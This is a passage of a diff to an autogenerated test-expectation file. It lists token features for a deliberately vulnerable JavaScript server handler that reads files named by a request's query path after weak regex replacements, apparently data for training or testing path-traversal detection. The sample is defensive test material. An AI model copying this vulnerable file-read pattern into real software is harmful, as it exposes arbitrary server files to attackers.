+| autogenerated/TaintedPath/TaintedPath.js:192:3:192:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:3:192:92 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:7:192:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:7:192:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:7:192:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:7:192:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:7:192:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | exceptional return of fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | exceptional return of fs.read ... /, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | exceptional return of fs.read ... /, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | exceptional return of fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | exceptional return of fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | fs.read ... /, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | fs.read ... /, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | fs.read ... /, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6603,6 +65637,17 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | fs.read ... /, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | fs.read ... /, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:192:13:192:91 | fs.read ... /, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:192:16:192:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:16:192:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:16:192:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:16:192:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:16:192:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:29:192:36 | "prefix" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:29:192:36 | "prefix" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:29:192:36 | "prefix" | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:29:192:36 | "prefix" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:29:192:36 | "prefix" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:29:192:36 | "prefix" | stringConcatenatedWith | -endpoint- pathModule.normalize().replace() | | autogenerated/TaintedPath/TaintedPath.js:192:29:192:90 | "prefix ... */, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:192:29:192:90 | "prefix ... */, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:192:29:192:90 | "prefix ... */, '') | calleeImports | fs | @@ -6612,6 +65657,47 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:192:29:192:90 | "prefix ... */, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:192:29:192:90 | "prefix ... */, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:192:29:192:90 | "prefix ... */, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:49 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:49 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:49 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:49 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:49 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:59 | pathModule.normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:59 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:59 | pathModule.normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:59 | pathModule.normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:59 | pathModule.normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:65 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:73 | pathMod ... replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:73 | pathMod ... replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:73 | pathMod ... replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:73 | pathMod ... replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:73 | pathMod ... replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | exceptional return of pathMod ... */, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | exceptional return of pathMod ... */, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | exceptional return of pathMod ... */, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | exceptional return of pathMod ... */, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | exceptional return of pathMod ... */, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | pathMod ... */, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | pathMod ... */, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:192:40:192:90 | pathMod ... */, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write 